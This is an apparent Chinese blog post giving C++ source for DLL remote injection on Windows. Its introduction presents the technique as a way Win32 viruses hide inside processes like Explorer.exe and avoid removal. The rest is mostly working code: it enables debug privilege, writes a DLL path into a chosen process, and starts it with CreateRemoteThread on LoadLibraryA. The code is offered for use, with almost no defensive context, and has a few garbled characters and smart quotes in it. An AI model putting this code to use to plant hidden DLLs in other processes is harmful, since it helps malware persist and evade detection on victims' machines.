C++：dll远程注入技术详解

DLL的远程注入技术是目前Win32病毒广泛使用的一种技术。使用这种技术的病毒体通常位于一个DLL中，在系统启动的时候，一个EXE程序会将这个 DLL加载至某些系统进程（如Explorer.exe）中运行。这样一来，普通的进程管理器就很难发现这种病毒了，而且即使发现了也很难清除，因为只要病毒寄生的进程不终止运行，那么这个DLL就不会在内存中卸载，用户也无法在资源管理器中删除这个DLL文件。

好了废话不说，下面代码：

#include <windows.h>
#include <iostream.h>

bool EnableDebugPriv()
{
    HANDLE hToken;
    LUID sedebugnameValue;
    TOKEN_PRIVILEGES tkp;
�
    if (!OpenProcessToken(GetCurrentProcess(),
        TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
        return false;
    }

    if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &sedebugnameValue)) {
        CloseHandle(hToken);
        return false;
    }

    tkp.PrivilegeCount = 1;
    tkp.Privileges[0].Luid = sedebugnameValue;
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    if (!AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof(tkp), NULL, NULL)) {
        CloseHandle(hToken);
        return false;
    }

    return true;
}

BOOL InitDll(const char *DllFullPath, const DWORD dwRemoteProcessId)
{
     EnableDebugPriv();

      HANDLE hRemoteProcess;
  �
    //打开远程线程
    hRemoteProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, dwRemoteProcessId );

        char *pszLibFileRemote;

    //使用VirtualAllocEx函数在远程进程的内存地址空间分配DLL文件名空间
    pszLibFileRemote = (char *) VirtualAllocEx( hRemoteProcess, NULL, lstrlen(DllFullPath)+1,
  MEM_COMMIT, PAGE_READWRITE);

    //使用WriteProcessMemory函数将DLL的路径名写入到远程进程的内存空间
    WriteProcessMemory(hRemoteProcess, pszLibFileRemote, (void *) DllFullPath,
     lstrlen(DllFullPath)+1, NULL);

     DWORD dwID;
     LPVOID pFunc = LoadLibraryA;
     HANDLE hRemoteThread = CreateRemoteThread(hRemoteProcess, NULL, 0,
   (LPTHREAD_START_ROUTINE)pFunc, pszLibFileRemote, 0, &dwID );
    

   if(hRemoteThread == NULL)
      {
      cout<<”注入线程失败!”<<endl;
      return 0;
      }
    CloseHandle(hRemoteProcess);
    CloseHandle(hRemoteThread);

    return TRUE;
}

int main()
{
    InitDll(“C://hook.dll”, 数字) ;//这个dll你所要注入的dll文件，这个”数字”是你想注入的进程的PID号
    return 0;
}

 作者“ 李木空间 ”